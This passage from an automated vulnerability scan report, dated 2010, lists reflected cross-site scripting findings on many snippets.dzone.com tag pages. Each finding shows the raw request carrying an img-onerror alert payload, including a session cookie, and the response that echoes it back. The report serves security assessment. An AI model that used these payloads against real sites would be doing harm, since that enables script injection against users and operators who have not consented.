/tag/math |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 359e6<img%20src%3da%20onerror%3dalert(1)>88a3f69a754 was submitted in the REST URL parameter 2. This input was echoed as 359e6<img src=a onerror=alert(1)>88a3f69a754 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/math359e6<img%20src%3da%20onerror%3dalert(1)>88a3f69a754 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:17:28 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/math359e6%3Cimg+src%3Da+onerror%3Dalert%281%29%3E88a3f69a754">math359e6<img src=a onerror=alert(1)>88a3f69a754</a>
...[SNIP]...
|
1.32. http://snippets.dzone.com/tag/mysql [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/mysql |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2153a<img%20src%3da%20onerror%3dalert(1)>41425412ee7 was submitted in the REST URL parameter 2. This input was echoed as 2153a<img src=a onerror=alert(1)>41425412ee7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/mysql2153a<img%20src%3da%20onerror%3dalert(1)>41425412ee7 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:32 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9436
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/mysql2153a%3Cimg+src%3Da+onerror%3Dalert%281%29%3E41425412ee7">mysql2153a<img src=a onerror=alert(1)>41425412ee7</a>
...[SNIP]...
|
1.33. http://snippets.dzone.com/tag/osx [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/osx |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 22cbb<img%20src%3da%20onerror%3dalert(1)>d334baadb57 was submitted in the REST URL parameter 2. This input was echoed as 22cbb<img src=a onerror=alert(1)>d334baadb57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/osx22cbb<img%20src%3da%20onerror%3dalert(1)>d334baadb57 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:17:15 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9430
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/osx22cbb%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed334baadb57">osx22cbb<img src=a onerror=alert(1)>d334baadb57</a>
...[SNIP]...
|
1.34. http://snippets.dzone.com/tag/perl [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/perl |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 55c61<img%20src%3da%20onerror%3dalert(1)>e237ec3cea2 was submitted in the REST URL parameter 2. This input was echoed as 55c61<img src=a onerror=alert(1)>e237ec3cea2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/perl55c61<img%20src%3da%20onerror%3dalert(1)>e237ec3cea2 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:17:31 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/perl55c61%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee237ec3cea2">perl55c61<img src=a onerror=alert(1)>e237ec3cea2</a>
...[SNIP]...
|
1.35. http://snippets.dzone.com/tag/php [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/php |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2ef2<img%20src%3da%20onerror%3dalert(1)>1f2530bde3c was submitted in the REST URL parameter 2. This input was echoed as b2ef2<img src=a onerror=alert(1)>1f2530bde3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/phpb2ef2<img%20src%3da%20onerror%3dalert(1)>1f2530bde3c HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:17:45 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9430
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/phpb2ef2%3Cimg+src%3Da+onerror%3Dalert%281%29%3E1f2530bde3c">phpb2ef2<img src=a onerror=alert(1)>1f2530bde3c</a>
...[SNIP]...
|
1.36. http://snippets.dzone.com/tag/python [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/python |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 75c3f<img%20src%3da%20onerror%3dalert(1)>99406f489de was submitted in the REST URL parameter 2. This input was echoed as 75c3f<img src=a onerror=alert(1)>99406f489de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/python75c3f<img%20src%3da%20onerror%3dalert(1)>99406f489de HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:17:38 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9439
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/python75c3f%3Cimg+src%3Da+onerror%3Dalert%281%29%3E99406f489de">python75c3f<img src=a onerror=alert(1)>99406f489de</a>
...[SNIP]...
|
1.37. http://snippets.dzone.com/tag/rails [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/rails |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2f56<img%20src%3da%20onerror%3dalert(1)>22bbab6269b was submitted in the REST URL parameter 2. This input was echoed as b2f56<img src=a onerror=alert(1)>22bbab6269b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/railsb2f56<img%20src%3da%20onerror%3dalert(1)>22bbab6269b HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:17:38 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9436
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/railsb2f56%3Cimg+src%3Da+onerror%3Dalert%281%29%3E22bbab6269b">railsb2f56<img src=a onerror=alert(1)>22bbab6269b</a>
...[SNIP]...
|
1.38. http://snippets.dzone.com/tag/raoni [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/raoni |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65fb4<img%20src%3da%20onerror%3dalert(1)>2e6d36e626e was submitted in the REST URL parameter 2. This input was echoed as 65fb4<img src=a onerror=alert(1)>2e6d36e626e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/raoni65fb4<img%20src%3da%20onerror%3dalert(1)>2e6d36e626e HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:30 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9436
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/raoni65fb4%3Cimg+src%3Da+onerror%3Dalert%281%29%3E2e6d36e626e">raoni65fb4<img src=a onerror=alert(1)>2e6d36e626e</a>
...[SNIP]...
|
1.39. http://snippets.dzone.com/tag/regex [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/regex |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload adac9<img%20src%3da%20onerror%3dalert(1)>87db678a026 was submitted in the REST URL parameter 2. This input was echoed as adac9<img src=a onerror=alert(1)>87db678a026 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/regexadac9<img%20src%3da%20onerror%3dalert(1)>87db678a026 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:27 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9436
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/regexadac9%3Cimg+src%3Da+onerror%3Dalert%281%29%3E87db678a026">regexadac9<img src=a onerror=alert(1)>87db678a026</a>
...[SNIP]...
|
1.40. http://snippets.dzone.com/tag/remove [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/remove |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 75af1<img%20src%3da%20onerror%3dalert(1)>9dcd43be9c1 was submitted in the REST URL parameter 2. This input was echoed as 75af1<img src=a onerror=alert(1)>9dcd43be9c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/remove75af1<img%20src%3da%20onerror%3dalert(1)>9dcd43be9c1 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:19:10 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9439
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/remove75af1%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9dcd43be9c1">remove75af1<img src=a onerror=alert(1)>9dcd43be9c1</a>
...[SNIP]...
|
1.41. http://snippets.dzone.com/tag/rexml [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/rexml |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5e901<img%20src%3da%20onerror%3dalert(1)>f7362f8a677 was submitted in the REST URL parameter 2. This input was echoed as 5e901<img src=a onerror=alert(1)>f7362f8a677 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/rexml5e901<img%20src%3da%20onerror%3dalert(1)>f7362f8a677 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:17:20 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9436
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/rexml5e901%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef7362f8a677">rexml5e901<img src=a onerror=alert(1)>f7362f8a677</a>
...[SNIP]...
|
1.42. http://snippets.dzone.com/tag/rmagick [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/rmagick |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce77c<img%20src%3da%20onerror%3dalert(1)>4e69d6192ea was submitted in the REST URL parameter 2. This input was echoed as ce77c<img src=a onerror=alert(1)>4e69d6192ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/rmagickce77c<img%20src%3da%20onerror%3dalert(1)>4e69d6192ea HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:19:30 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9442
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/rmagickce77c%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4e69d6192ea">rmagickce77c<img src=a onerror=alert(1)>4e69d6192ea</a>
...[SNIP]...
|
1.43. http://snippets.dzone.com/tag/rscript [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/rscript |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f27a8<img%20src%3da%20onerror%3dalert(1)>8da2a1224c4 was submitted in the REST URL parameter 2. This input was echoed as f27a8<img src=a onerror=alert(1)>8da2a1224c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/rscriptf27a8<img%20src%3da%20onerror%3dalert(1)>8da2a1224c4 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:16:53 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9442
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/rscriptf27a8%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8da2a1224c4">rscriptf27a8<img src=a onerror=alert(1)>8da2a1224c4</a>
...[SNIP]...
|
1.44. http://snippets.dzone.com/tag/ruby [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/ruby |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc7d5<img%20src%3da%20onerror%3dalert(1)>39811efedcb was submitted in the REST URL parameter 2. This input was echoed as cc7d5<img src=a onerror=alert(1)>39811efedcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/rubycc7d5<img%20src%3da%20onerror%3dalert(1)>39811efedcb HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:32 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9433
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/rubycc7d5%3Cimg+src%3Da+onerror%3Dalert%281%29%3E39811efedcb">rubycc7d5<img src=a onerror=alert(1)>39811efedcb</a>
...[SNIP]...
|
1.45. http://snippets.dzone.com/tag/rubyonrails [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/rubyonrails |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 77d15<img%20src%3da%20onerror%3dalert(1)>34b60277f5b was submitted in the REST URL parameter 2. This input was echoed as 77d15<img src=a onerror=alert(1)>34b60277f5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/rubyonrails77d15<img%20src%3da%20onerror%3dalert(1)>34b60277f5b HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:41 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9454
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/rubyonrails77d15%3Cimg+src%3Da+onerror%3Dalert%281%29%3E34b60277f5b">rubyonrails77d15<img src=a onerror=alert(1)>34b60277f5b</a>
...[SNIP]...
|
1.46. http://snippets.dzone.com/tag/series60 [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/series60 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25c64<img%20src%3da%20onerror%3dalert(1)>feeeff2d457 was submitted in the REST URL parameter 2. This input was echoed as 25c64<img src=a onerror=alert(1)>feeeff2d457 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/series6025c64<img%20src%3da%20onerror%3dalert(1)>feeeff2d457 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:42 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9445
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/series6025c64%3Cimg+src%3Da+onerror%3Dalert%281%29%3Efeeeff2d457">series6025c64<img src=a onerror=alert(1)>feeeff2d457</a>
...[SNIP]...
|
1.47. http://snippets.dzone.com/tag/shell [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
/tag/shell |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eadb8<img%20src%3da%20onerror%3dalert(1)>593074ec9f2 was submitted in the REST URL parameter 2. This input was echoed as eadb8<img src=a onerror=alert(1)>593074ec9f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/shelleadb8<img%20src%3da%20onerror%3dalert(1)>593074ec9f2 HTTP/1.1
Host: snippets.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388;
|
Response
HTTP/1.1 200 OK
Date: Fri, 12 Nov 2010 14:18:28 GMT
Server: Mongrel 1.1.5
Status: 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9436
Cache-Control: no-cache
Set-Cookie: _session_id=01939bfc40ab6f746d3adb6aec935388; path=/
Vary: Accept-Encoding
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="/tag/shelleadb8%3Cimg+src%3Da+onerror%3Dalert%281%29%3E593074ec9f2">shelleadb8<img src=a onerror=alert(1)>593074ec9f2</a>
...[SNIP]...
|
1.48. http://snippets.dzone.com/tag/sinatra [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://snippets.dzone.com |
| Path: |
